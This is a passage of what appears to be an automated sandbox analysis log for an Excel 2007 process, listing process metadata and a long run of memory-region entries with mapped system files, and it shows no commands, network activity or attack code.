# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Feb 8 2018 15:49:39 # Log Creation Date: 13.02.2018 17:15:43.740 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files (x86)\\microsoft office\\office12\\excel.exe" page_root = "0x6312000" os_pid = "0x930" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\"" cur_dir = "C:\\Users\\kFT6uTQW\\Desktop\\" os_username = "XABNCPUWKW\\kFT6uTQW" os_groups = "XABNCPUWKW\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000de82" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 135 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 136 start_va = 0x20000 end_va = 0x22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 137 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 138 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 139 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 140 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 141 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 142 start_va = 0x80000 end_va = 0x82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 143 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 144 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 145 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 146 start_va = 0x240000 end_va = 0x243fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 147 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 148 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 149 start_va = 0x270000 end_va = 0x287fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 150 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 151 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 152 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 153 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 154 start_va = 0x2d0000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 155 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 156 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 157 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 158 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 159 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 160 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 161 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 162 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 163 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 164 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 165 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 166 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 167 start_va = 0x410000 end_va = 0x411fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 168 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 169 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 170 start_va = 0x440000 end_va = 0x441fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 171 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 172 start_va = 0x550000 end_va = 0x6d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 173 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 174 start_va = 0x870000 end_va = 0x1c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 175 start_va = 0x1c70000 end_va = 0x1e19fff entry_point = 0x1c70000 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office12\\1033\\XLINTL32.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office12\\1033\\xlintl32.dll") Region: id = 176 start_va = 0x1e20000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 177 start_va = 0x1e30000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 178 start_va = 0x1e40000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 179 start_va = 0x1e50000 end_va = 0x2089fff entry_point = 0x1e50000 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office12\\cultures\\office.odf") Region: id = 180 start_va = 0x2090000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 181 start_va = 0x20b0000 end_va = 0x20b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 182 start_va = 0x20c0000 end_va = 0x20c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 183 start_va = 0x20d0000 end_va = 0x210ffff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 184 start_va = 0x2110000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 185 start_va = 0x2150000 end_va = 0x222efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 186 start_va = 0x2230000 end_va = 0x24fefff entry_point = 0x2230000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 187 start_va = 0x2500000 end_va = 0x2500fff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 188 start_va = 0x2510000 end_va = 0x2510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002510000" filename = "" Region: id = 189 start_va = 0x2520000 end_va = 0x2520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002520000" filename = "" Region: id = 190 start_va = 0x2530000 end_va = 0x253ffff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 191 start_va = 0x2540000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 192 start_va = 0x2550000 end_va = 0x255ffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 193 start_va = 0x2560000 end_va = 0x256ffff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 194 start_va = 0x2570000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 195 start_va = 0x25b0000 end_va = 0x2edffff entry_point = 0x25b0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 196 start_va = 0x2ee0000 end_va = 0x2eeffff entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 197 start_va = 0x2ef0000 end_va = 0x2efffff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 198 start_va = 0x2f00000 end_va = 0x2f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 199 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 200 start_va = 0x2f50000 end_va = 0x2f56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f50000" filename = "" Region: id = 201 start_va = 0x2f60000 end_va = 0x2f61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f60000" filename = "" Region: id = 202 start_va = 0x2f70000 end_va = 0x2f70fff entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 203 start_va = 0x2f80000 end_va = 0x2fbffff entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 204 start_va = 0x2fc0000 end_va = 0x2fcffff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 205 start_va = 0x2fd0000 end_va = 0x2fdffff entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 206 start_va = 0x2fe0000 end_va = 0x30dffff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 207 start_va = 0x30e0000 end_va = 0x315ffff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 208 start_va = 0x3160000 end_va = 0x325ffff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 209 start_va = 0x3260000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 210 start_va = 0x3270000 end_va = 0x327ffff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 211 start_va = 0x3280000 end_va = 0x337ffff entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 212 start_va = 0x3380000 end_va = 0x338ffff entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 213 start_va = 0x3390000 end_va = 0x339ffff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 214 start_va = 0x33a0000 end_va = 0x33affff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 215 start_va = 0x33b0000 end_va = 0x33bffff entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 216 start_va = 0x33c0000 end_va = 0x33cffff entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 217 start_va = 0x33d0000 end_va = 0x33dffff entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 218 start_va = 0x33e0000 end_va = 0x33effff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 219 start_va = 0x33f0000 end_va = 0x33fffff entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 220 start_va = 0x3400000 end_va = 0x340ffff entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 221 start_va = 0x3410000 end_va = 0x3411fff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 222 start_va = 0x3420000 end_va = 0x342ffff entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 223 start_va = 0x3430000 end_va = 0x352ffff entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 224 start_va = 0x3530000 end_va = 0x3530fff entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 225 start_va = 0x3540000 end_va = 0x3545fff entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 226 start_va = 0x3550000 end_va = 0x355efff entry_point = 0x0 region_type = private name = "private_0x0000000003550000" filename = "" Region: id = 227 start_va = 0x3560000 end_va = 0x3560fff entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 228 start_va = 0x3570000 end_va = 0x357ffff entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 229 start_va = 0x3580000 end_va = 0x35bffff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 230 start_va = 0x35c0000 end_va = 0x35c8fff entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 231 start_va = 0x35d0000 end_va = 0x35d8fff entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 232 start_va = 0x35e0000 end_va = 0x35effff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 233 start_va = 0x35f0000 end_va = 0x35f8fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 234 start_va = 0x3600000 end_va = 0x363ffff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 235 start_va = 0x3640000 end_va = 0x3a32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003640000" filename = "" Region: id = 236 start_va = 0x3a40000 end_va = 0x3a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a40000" filename = "" Region: id = 237 start_va = 0x3a50000 end_va = 0x3a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 238 start_va = 0x3a60000 end_va = 0x3a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a60000" filename = "" Region: id = 239 start_va = 0x3a70000 end_va = 0x3a70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a70000" filename = "" Region: id = 240 start_va = 0x3a80000 end_va = 0x3a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 241 start_va = 0x3a90000 end_va = 0x3a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 242 start_va = 0x3aa0000 end_va = 0x3aaffff entry_point = 0x0 region_type = private name = "private_0x0000000003aa0000" filename = "" Region: id = 243 start_va = 0x3ab0000 end_va = 0x3ab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ab0000" filename = "" Region: id = 244 start_va = 0x3ac0000 end_va = 0x3ac0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ac0000" filename = "" Region: id = 245 start_va = 0x3ad0000 end_va = 0x3ad0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ad0000" filename = "" Region: id = 246 start_va = 0x3ae0000 end_va = 0x3ae0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 247 start_va = 0x3af0000 end_va = 0x3af0fff entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 248 start_va = 0x3b00000 end_va = 0x3b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 249 start_va = 0x3b40000 end_va = 0x3b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 250 start_va = 0x3b80000 end_va = 0x3bbffff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 251 start_va = 0x3bc0000 end_va = 0x3bc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bc0000" filename = "" Region: id = 252 start_va = 0x3bd0000 end_va = 0x3bdffff entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 253 start_va = 0x3be0000 end_va = 0x3bebfff entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 254 start_va = 0x3bf0000 end_va = 0x3bf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 255 start_va = 0x3c00000 end_va = 0x3c00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c00000" filename = "" Region: id = 256 start_va = 0x3c10000 end_va = 0x3d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 257 start_va = 0x3d10000 end_va = 0x3e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 258 start_va = 0x3e10000 end_va = 0x3f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 259 start_va = 0x3f10000 end_va = 0x3f10fff entry_point = 0x3f10000 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\SysWOW64\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wdmaud.drv.mui") Region: id = 260 start_va = 0x3f20000 end_va = 0x3f20fff entry_point = 0x3f20000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mmdevapi.dll.mui") Region: id = 261 start_va = 0x3f30000 end_va = 0x3f31fff entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 262 start_va = 0x3f40000 end_va = 0x3f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 263 start_va = 0x3f50000 end_va = 0x3f73fff entry_point = 0x3f50000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 264 start_va = 0x3f80000 end_va = 0x3f80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f80000" filename = "" Region: id = 265 start_va = 0x3f90000 end_va = 0x3fcffff entry_point = 0x0 region_type = private name = "private_0x0000000003f90000" filename = "" Region: id = 266 start_va = 0x3fd0000 end_va = 0x3fd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fd0000" filename = "" Region: id = 267 start_va = 0x3fe0000 end_va = 0x3fecfff entry_point = 0x3fe0000 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\comdlg32.dll.mui") Region: id = 268 start_va = 0x3ff0000 end_va = 0x3ff1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ff0000" filename = "" Region: id = 269 start_va = 0x4000000 end_va = 0x4001fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004000000" filename = "" Region: id = 270 start_va = 0x4010000 end_va = 0x4010fff entry_point = 0x0 region_type = private name = "private_0x0000000004010000" filename = "" Region: id = 271 start_va = 0x4020000 end_va = 0x4022fff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 272 start_va = 0x4030000 end_va = 0x4032fff entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 273 start_va = 0x4040000 end_va = 0x407ffff entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 274 start_va = 0x4080000 end_va = 0x4082fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 275 start_va = 0x4090000 end_va = 0x418ffff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 276 start_va = 0x4190000 end_va = 0x428ffff entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 277 start_va = 0x4290000 end_va = 0x4290fff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 278 start_va = 0x42a0000 end_va = 0x42a2fff entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 279 start_va = 0x42b0000 end_va = 0x42bffff entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 280 start_va = 0x42c0000 end_va = 0x42c1fff entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 281 start_va = 0x42d0000 end_va = 0x42d3fff entry_point = 0x42d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 282 start_va = 0x42e0000 end_va = 0x42e0fff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 283 start_va = 0x42f0000 end_va = 0x432ffff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 284 start_va = 0x4330000 end_va = 0x442ffff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 285 start_va = 0x4430000 end_va = 0x4831fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 286 start_va = 0x4840000 end_va = 0x4851fff entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 287 start_va = 0x4860000 end_va = 0x4871fff entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 288 start_va = 0x4880000 end_va = 0x4880fff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 289 start_va = 0x4890000 end_va = 0x4890fff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 290 start_va = 0x48a0000 end_va = 0x48e7fff entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 291 start_va = 0x48f0000 end_va = 0x4937fff entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 292 start_va = 0x4940000 end_va = 0x4940fff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 293 start_va = 0x4950000 end_va = 0x4950fff entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 294 start_va = 0x4960000 end_va = 0x4960fff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 295 start_va = 0x4970000 end_va = 0x49affff entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 296 start_va = 0x49b0000 end_va = 0x49b0fff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 297 start_va = 0x49c0000 end_va = 0x49cffff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 298 start_va = 0x49d0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 299 start_va = 0x4ad0000 end_va = 0x4bcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 300 start_va = 0x4bd0000 end_va = 0x4bd3fff entry_point = 0x4bd0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 301 start_va = 0x4be0000 end_va = 0x4be1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004be0000" filename = "" Region: id = 302 start_va = 0x4bf0000 end_va = 0x4c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 303 start_va = 0x4c30000 end_va = 0x4c30fff entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 304 start_va = 0x4c40000 end_va = 0x4c40fff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 305 start_va = 0x4c50000 end_va = 0x4c50fff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 306 start_va = 0x4c60000 end_va = 0x4c60fff entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 307 start_va = 0x4c70000 end_va = 0x4c70fff entry_point = 0x0 region_type = private name = "private_0x0000000004c70000" filename = "" Region: id = 308 start_va = 0x4c80000 end_va = 0x4c80fff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 309 start_va = 0x4c90000 end_va = 0x4c90fff entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 310 start_va = 0x4ca0000 end_va = 0x4ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 311 start_va = 0x4cb0000 end_va = 0x4daffff entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 312 start_va = 0x4db0000 end_va = 0x4ddffff entry_point = 0x4db0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000a.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db") Region: id = 313 start_va = 0x4de0000 end_va = 0x4de1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004de0000" filename = "" Region: id = 314 start_va = 0x4df0000 end_va = 0x4df0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004df0000" filename = "" Region: id = 315 start_va = 0x4e00000 end_va = 0x4e00fff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 316 start_va = 0x4e10000 end_va = 0x4e10fff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 317 start_va = 0x4e20000 end_va = 0x4e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 318 start_va = 0x4e60000 end_va = 0x4ec5fff entry_point = 0x4e60000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 319 start_va = 0x4ed0000 end_va = 0x4ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 320 start_va = 0x4ee0000 end_va = 0x4ee3fff entry_point = 0x4ee0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 321 start_va = 0x4ef0000 end_va = 0x4ef0fff entry_point = 0x4ef0000 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 322 start_va = 0x4f00000 end_va = 0x4f00fff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 323 start_va = 0x4f10000 end_va = 0x4f17fff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 324 start_va = 0x4f20000 end_va = 0x4f20fff entry_point = 0x4f20000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 325 start_va = 